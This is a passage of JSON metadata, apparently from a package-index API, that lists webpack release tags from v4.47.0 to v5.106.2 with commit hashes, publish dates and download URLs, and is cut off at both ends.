es/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack